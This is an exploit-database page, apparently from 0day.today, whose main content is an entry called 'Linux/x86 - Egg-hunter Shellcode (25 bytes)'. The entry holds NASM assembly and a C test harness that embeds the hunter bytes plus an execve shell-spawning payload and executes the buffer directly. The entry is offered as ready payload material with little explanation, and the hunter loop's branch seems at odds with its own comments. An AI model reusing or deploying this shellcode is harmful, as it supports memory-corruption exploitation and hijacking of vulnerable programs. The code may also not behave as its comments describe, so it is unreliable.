0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Linux/x86 - Egg-hunter Shellcode (25 bytes)

Author

Filippo Bersani

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

/*
;author: Filippo "zinzloun" Bersani
;date: 25/11/2016
;version 1.0
;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
;           Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
 
 
global _start
section .text
_start:
 
 fldz                           ;with this 2 instructions...
 fnstenv [esp-0xc]              ;set the entry point of my egg (_start)
 
 pop esi                        ;get the entry point addr...
 lea esi,[esi+24]               ;the trick: move to pointer @ the last byte of this egg hunter
 
 mov edx, dword 0x65676760      ;a dumm value..
 rol edx, 0x4                   ;...to get the real egg mark: 56767606
 
find_egg:
 inc esi                        ;scan the next section of memory after this code
 cmp [esi], edx                 ;check if we have found the egg...
 jz find_egg                    ;loop
 call esi                       ;egg found (zero flag is set), jump to the address to exec the shell code
 */
  
#include<stdio.h>
#include<string.h>
 
unsigned char egg_hunter[] = \
"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6";
unsigned char shell_code[] = \
"\x06\x76\x76\x56" // egg id reversed
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash
main()
{
        printf("Egg hunter length:  %d\n", strlen(egg_hunter));
        printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
        int (*ret)() = (int(*)())egg_hunter;
        ret();
}

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Linux/x86 - Egg-hunter Shellcode (25 bytes)

Report Error

Report Error